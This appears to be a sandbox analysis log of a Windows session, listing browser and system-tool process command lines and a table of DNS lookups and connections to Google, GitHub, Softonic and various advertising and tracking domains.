C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=1072 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:1
C:\Windows\SysWOW64\mmc.exe
"C:\Windows\System32\mmc.exe"
C:\Windows\system32\mmc.exe
"C:\Windows\system32\mmc.exe"
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=3716 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=1000 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5388 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5180 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:8
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=2140 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=3508 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:1
C:\Windows\SysWOW64\mmc.exe
"C:\Windows\System32\mmc.exe"
C:\Windows\system32\mmc.exe
"C:\Windows\system32\mmc.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5936 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:8
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=5912 --field-trial-handle=1716,i,1028120338899196498,8756102318467629794,131072 /prefetch:1
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SysWOW64\mmc.exe
"C:\Windows\system32\mmc.exe" "C:\Windows\System32\devmgmt.msc"
C:\Windows\system32\mmc.exe
"C:\Windows\System32\devmgmt.msc" "C:\Windows\System32\devmgmt.msc"
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\SysWOW64\mspaint.exe
"C:\Windows\System32\mspaint.exe"
\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SysWOW64\Taskmgr.exe
"C:\Windows\System32\Taskmgr.exe"
C:\Windows\SysWOW64\mmc.exe
"C:\Windows\System32\mmc.exe"
C:\Windows\system32\mmc.exe
"C:\Windows\system32\mmc.exe"
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 250.255.255.239.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| NL | 172.217.168.206:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | 100.39.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| NL | 142.251.36.46:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 46.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.0.0.224.in-addr.arpa | udp |
| US | 8.8.8.8:53 | b.f.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa | udp |
| NL | 20.103.253.93:80 | tcp | |
| NL | 142.251.36.46:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | ogs.google.com | udp |
| NL | 142.250.179.206:443 | ogs.google.com | tcp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| NL | 172.217.168.195:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | 206.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| NL | 172.217.168.206:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| NL | 142.250.179.206:443 | play.google.com | tcp |
| NL | 142.250.179.206:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 98.39.251.142.in-addr.arpa | udp |
| US | 20.189.173.12:443 | tcp | |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| NL | 142.250.179.182:443 | i.ytimg.com | tcp |
| NL | 142.251.36.14:443 | encrypted-tbn0.gstatic.com | tcp |
| NL | 142.251.36.14:443 | encrypted-tbn0.gstatic.com | tcp |
| NL | 142.251.36.14:443 | encrypted-tbn0.gstatic.com | tcp |
| NL | 142.251.36.14:443 | encrypted-tbn0.gstatic.com | tcp |
| NL | 142.251.36.14:443 | encrypted-tbn0.gstatic.com | tcp |
| NL | 142.251.36.14:443 | encrypted-tbn0.gstatic.com | tcp |
| US | 8.8.8.8:53 | 203.151.224.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| NL | 142.250.179.194:443 | googleads.g.doubleclick.net | tcp |
| NL | 142.250.179.198:443 | static.doubleclick.net | tcp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| NL | 142.251.36.10:443 | jnn-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | 194.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.36.251.142.in-addr.arpa | udp |
| NL | 142.251.36.10:443 | jnn-pa.googleapis.com | udp |
| NL | 142.250.179.194:443 | googleads.g.doubleclick.net | udp |
| US | 93.184.221.240:80 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| IN | 20.207.73.82:443 | github.com | tcp |
| IN | 20.207.73.82:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 82.73.207.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| IN | 20.207.73.85:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 154.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.114.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.73.207.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| NL | 216.58.214.3:443 | beacons.gcp.gvt2.com | tcp |
| NL | 216.58.214.3:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | e2c10.gcp.gvt2.com | udp |
| AU | 34.116.74.210:443 | e2c10.gcp.gvt2.com | tcp |
| AU | 34.116.74.210:443 | e2c10.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 3.214.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.74.116.34.in-addr.arpa | udp |
| NL | 216.58.214.3:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| US | 8.8.8.8:53 | e2cs45.gcp.gvt2.com | udp |
| CA | 35.215.11.11:443 | e2cs45.gcp.gvt2.com | tcp |
| NL | 142.250.179.182:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | 11.11.215.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons2.gvt2.com | udp |
| IN | 172.217.166.227:443 | beacons2.gvt2.com | tcp |
| NL | 216.58.214.10:443 | content-autofill.googleapis.com | udp |
| IN | 172.217.166.227:443 | beacons2.gvt2.com | tcp |
| US | 8.8.8.8:53 | 10.214.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.166.217.172.in-addr.arpa | udp |
| NL | 142.250.179.194:443 | googleads.g.doubleclick.net | udp |
| NL | 142.250.179.198:443 | static.doubleclick.net | udp |
| NL | 142.251.36.10:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn2.gstatic.com | udp |
| NL | 142.251.36.14:443 | encrypted-tbn2.gstatic.com | udp |
| US | 8.8.8.8:53 | google.co.ck | udp |
| NL | 172.217.168.228:80 | google.co.ck | tcp |
| NL | 172.217.168.228:80 | google.co.ck | tcp |
| US | 8.8.8.8:53 | www.google.co.ck | udp |
| NL | 142.250.179.195:80 | www.google.co.ck | tcp |
| NL | 142.250.179.195:80 | www.google.co.ck | tcp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| US | 8.8.8.8:53 | 228.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.36.251.142.in-addr.arpa | udp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| US | 8.8.8.8:53 | beacons4.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 8.8.8.8:53 | 116.32.239.216.in-addr.arpa | udp |
| NL | 172.217.168.228:80 | google.co.ck | tcp |
| NL | 172.217.168.228:80 | google.co.ck | tcp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| US | 8.8.8.8:53 | id.google.co.ck | udp |
| GB | 216.58.208.99:443 | id.google.co.ck | tcp |
| GB | 216.58.208.99:443 | id.google.co.ck | tcp |
| US | 8.8.8.8:53 | 99.208.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.wikia.nocookie.net | udp |
| DE | 74.120.188.204:443 | static.wikia.nocookie.net | tcp |
| US | 8.8.8.8:53 | 204.188.120.74.in-addr.arpa | udp |
| NL | 172.217.168.228:80 | google.co.ck | tcp |
| NL | 172.217.168.228:80 | google.co.ck | tcp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| GB | 216.58.208.99:443 | id.google.co.ck | tcp |
| GB | 216.58.208.99:443 | id.google.co.ck | tcp |
| NL | 142.250.179.182:443 | i.ytimg.com | udp |
| NL | 172.217.168.228:80 | google.co.ck | tcp |
| NL | 172.217.168.228:80 | google.co.ck | tcp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| NL | 142.250.179.194:443 | googleads.g.doubleclick.net | udp |
| NL | 142.250.179.198:443 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| NL | 142.250.179.170:443 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 170.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| NL | 142.251.36.14:443 | encrypted-tbn0.gstatic.com | udp |
| NL | 142.251.36.14:443 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | beacons3.gvt2.com | udp |
| GB | 216.58.208.99:443 | beacons3.gvt2.com | tcp |
| GB | 216.58.208.99:443 | beacons3.gvt2.com | udp |
| NL | 172.217.168.228:80 | google.co.ck | tcp |
| NL | 172.217.168.228:80 | google.co.ck | tcp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| NL | 216.58.214.3:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | softonic.com | udp |
| US | 35.227.233.104:80 | softonic.com | tcp |
| US | 35.227.233.104:80 | softonic.com | tcp |
| US | 8.8.8.8:53 | 104.233.227.35.in-addr.arpa | udp |
| US | 35.227.233.104:443 | softonic.com | tcp |
| US | 8.8.8.8:53 | www.softonic.com | udp |
| US | 35.227.233.104:443 | www.softonic.com | tcp |
| US | 35.227.233.104:443 | www.softonic.com | tcp |
| US | 8.8.8.8:53 | en.softonic.com | udp |
| US | 35.227.233.104:443 | en.softonic.com | tcp |
| US | 35.227.233.104:443 | en.softonic.com | tcp |
| US | 8.8.8.8:53 | 188.155.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | sc.sftcdn.net | udp |
| US | 8.8.8.8:53 | images.sftcdn.net | udp |
| NL | 172.217.168.194:443 | securepubads.g.doubleclick.net | tcp |
| NL | 172.217.168.194:443 | securepubads.g.doubleclick.net | tcp |
| US | 151.101.1.91:443 | sc.sftcdn.net | tcp |
| US | 151.101.1.91:443 | sc.sftcdn.net | tcp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| DE | 108.156.255.65:443 | c.amazon-adsystem.com | tcp |
| DE | 108.156.255.65:443 | c.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | static.criteo.net | udp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| US | 8.8.8.8:53 | amplify.outbrain.com | udp |
| NL | 23.222.47.122:443 | images.sftcdn.net | tcp |
| NL | 23.222.47.122:443 | images.sftcdn.net | tcp |
| NL | 23.222.47.122:443 | images.sftcdn.net | tcp |
| DE | 23.218.209.87:443 | amplify.outbrain.com | tcp |
| DE | 23.218.209.87:443 | amplify.outbrain.com | tcp |
| NL | 23.222.47.122:443 | images.sftcdn.net | tcp |
| NL | 23.222.47.122:443 | images.sftcdn.net | tcp |
| NL | 23.222.47.122:443 | images.sftcdn.net | tcp |
| US | 8.8.8.8:53 | 200.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.255.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.1.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.47.222.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.137.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.209.218.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tr.outbrain.com | udp |
| US | 50.31.142.127:443 | tr.outbrain.com | tcp |
| US | 50.31.142.127:443 | tr.outbrain.com | tcp |
| US | 8.8.8.8:53 | 67.55.52.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.20.225.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.137.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.142.31.50.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.hotjar.com | udp |
| NL | 52.222.139.116:443 | static.hotjar.com | tcp |
| NL | 52.222.139.116:443 | static.hotjar.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| NL | 142.251.36.34:443 | googleads.g.doubleclick.net | tcp |
| NL | 142.251.36.34:443 | googleads.g.doubleclick.net | tcp |
| US | 151.101.1.91:443 | sc.sftcdn.net | tcp |
| US | 151.101.1.91:443 | sc.sftcdn.net | tcp |
| US | 8.8.8.8:53 | 116.139.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gum.criteo.com | udp |
| US | 74.119.119.139:443 | gum.criteo.com | tcp |
| US | 74.119.119.139:443 | gum.criteo.com | tcp |
| US | 8.8.8.8:53 | ocsp.rootca3.amazontrust.com | udp |
| NL | 52.222.137.193:80 | ocsp.rootca3.amazontrust.com | tcp |
| US | 8.8.8.8:53 | 139.119.119.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.137.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | script.hotjar.com | udp |
| NL | 13.227.219.71:443 | script.hotjar.com | tcp |
| NL | 13.227.219.71:443 | script.hotjar.com | tcp |
| US | 8.8.8.8:53 | dnacdn.net | udp |
| US | 8.8.8.8:53 | ag.gbc.criteo.com | udp |
| SG | 182.161.73.136:443 | dnacdn.net | tcp |
| SG | 182.161.73.136:443 | dnacdn.net | tcp |
| US | 8.8.8.8:53 | gem.gbc.criteo.com | udp |
| SG | 116.213.23.214:443 | gem.gbc.criteo.com | tcp |
| SG | 116.213.23.214:443 | gem.gbc.criteo.com | tcp |
| US | 8.8.8.8:53 | 71.219.227.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.73.161.182.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.23.213.116.in-addr.arpa | udp |
| NL | 142.251.36.14:443 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | lens.google.com | udp |
| US | 8.8.8.8:53 | 110.39.251.142.in-addr.arpa | udp |
| NL | 172.217.168.228:80 | google.co.ck | tcp |
| NL | 172.217.168.228:80 | google.co.ck | tcp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| US | 8.8.8.8:53 | play.clubpenguin.com | udp |
| US | 8.8.8.8:53 | play.clubpenguin.com | udp |
| US | 8.8.8.8:53 | play.clubpenguin.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| NL | 216.58.214.3:443 | beacons.gcp.gvt2.com | udp |
| NL | 142.251.36.14:443 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | cdn.donmai.us | udp |
| US | 172.67.70.99:443 | cdn.donmai.us | tcp |
| US | 8.8.8.8:53 | 99.70.67.172.in-addr.arpa | udp |
| US | 172.67.70.99:443 | cdn.donmai.us | udp |
| US | 8.8.8.8:53 | danbooru.donmai.us | udp |
| NL | 172.217.168.228:80 | google.co.ck | tcp |
| NL | 172.217.168.228:80 | google.co.ck | tcp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| NL | 142.250.179.195:443 | www.google.co.ck | tcp |
| US | 8.8.8.8:53 | softonic.com | udp |
| US | 35.227.233.104:443 | softonic.com | tcp |
| US | 8.8.8.8:53 | www.softonic.com | udp |
| US | 35.227.233.104:443 | www.softonic.com | tcp |
| US | 35.227.233.104:443 | www.softonic.com | tcp |
| NL | 172.217.168.194:443 | securepubads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | sc.sftcdn.net | udp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | amplify.outbrain.com | udp |
| US | 8.8.8.8:53 | images.sftcdn.net | udp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| US | 151.101.1.91:443 | sc.sftcdn.net | tcp |
| US | 50.31.142.127:443 | tr.outbrain.com | tcp |
| US | 50.31.142.127:443 | tr.outbrain.com | tcp |
| US | 8.8.8.8:53 | static.hotjar.com | udp |
| DE | 23.218.209.87:443 | amplify.outbrain.com | tcp |
| NL | 52.222.136.109:443 | c.amazon-adsystem.com | tcp |
| NL | 23.222.47.122:443 | images.sftcdn.net | tcp |
| NL | 142.251.36.34:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | script.hotjar.com | udp |
| DE | 18.66.97.49:443 | static.hotjar.com | tcp |
| NL | 13.227.219.120:443 | script.hotjar.com | tcp |
| US | 8.8.8.8:53 | 120.150.79.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.136.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.97.66.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.219.227.13.in-addr.arpa | udp |
| US | 74.119.119.139:443 | gum.criteo.com | tcp |
| US | 74.119.119.139:443 | gum.criteo.com | tcp |
| US | 8.8.8.8:53 | ag.gbc.criteo.com | udp |
| SG | 116.213.23.210:443 | ag.gbc.criteo.com | tcp |
| SG | 116.213.23.210:443 | ag.gbc.criteo.com | tcp |
| SG | 182.161.73.136:443 | dnacdn.net | tcp |
| SG | 182.161.73.136:443 | dnacdn.net | tcp |
| SG | 116.213.23.214:443 | ag.gbc.criteo.com | tcp |
| SG | 116.213.23.214:443 | ag.gbc.criteo.com | tcp |
| US | 8.8.8.8:53 | notix.io | udp |
| NL | 139.45.240.92:443 | notix.io | tcp |
| US | 8.8.8.8:53 | 92.240.45.139.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.23.213.116.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.175.53.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sslwidget.criteo.com | udp |
| FR | 178.250.7.11:443 | sslwidget.criteo.com | tcp |
| US | 8.8.8.8:53 | widget.us.criteo.com | udp |
| US | 74.119.119.150:443 | widget.us.criteo.com | tcp |
| US | 8.8.8.8:53 | 11.7.250.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | x.bidswitch.net | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 8.8.8.8:53 | secure.adnxs.com | udp |
| US | 8.8.8.8:53 | contextual.media.net | udp |
| NL | 142.251.36.34:443 | cm.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | pixel.rubiconproject.com | udp |
| US | 8.8.8.8:53 | match.sharethrough.com | udp |
| US | 8.8.8.8:53 | rtb-csync.smartadserver.com | udp |
| NL | 185.89.210.122:443 | ib.adnxs.com | tcp |
